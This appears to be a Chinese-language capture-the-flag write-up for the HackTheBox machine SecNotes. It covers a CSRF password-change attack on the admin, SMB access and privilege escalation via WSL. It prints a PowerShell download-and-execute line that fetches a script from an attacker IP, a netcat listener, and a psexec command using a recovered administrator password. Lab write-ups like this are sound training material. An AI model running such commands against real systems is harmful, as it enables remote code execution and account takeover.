SecNotes - HackTheBox
Td

image

nmap扫描

image

image

访问80

image

一个登录框

8808端口

image

iis起始页

先注册一个进80看看

image

image

一个添加文章

image

一个改密码

image

一个写留言

修改密码不需要原始密码,看看有没有利用可能

image

修改后会跳转页面

image

这个应该就是管理员了,给他留言一个http连接试试

nc -nvlp 80

image

是利用powershell来请求的

看看能不能利用get提交修改密码参数

image

可以,把这个连接提交给管理员

imageimage

成功登录管理员账号

image

这里发现一个疑似smb的路径,先添加域名到hosts文件

image

smb连接一下

image

这个应该是8808端口的文件

上传一个后门文件,反弹shell

image

image

powershell -c "iex (new-object system.net.webclient).downloadstring('http://10.10.14.17/test.ps1')"

image

提权

image

检测脚本检测到靶机安装了wsl,这玩意类似于docker,并且还在里头安装了一个ubuntu操作系统,尝试连接一下wsl容器

image

可以执行命令,直接反弹一个shell

image

image

在当前目录.bash_history中发现administrator的密码

image

尝试连接smb

image

image

image

在administrator目录下发现root.txt,下载下来

虽然有了flag,但并没有实际的权限,考试中要拥有实际的权限在获取flag

利用psexec.py连接靶机

https://github.com/fortra/impacket/blob/master/examples/psexec.py

python psexec.py administrator:'u6!4ZwgwOM#^OBf#Nwnh'@10.10.10.97

image

image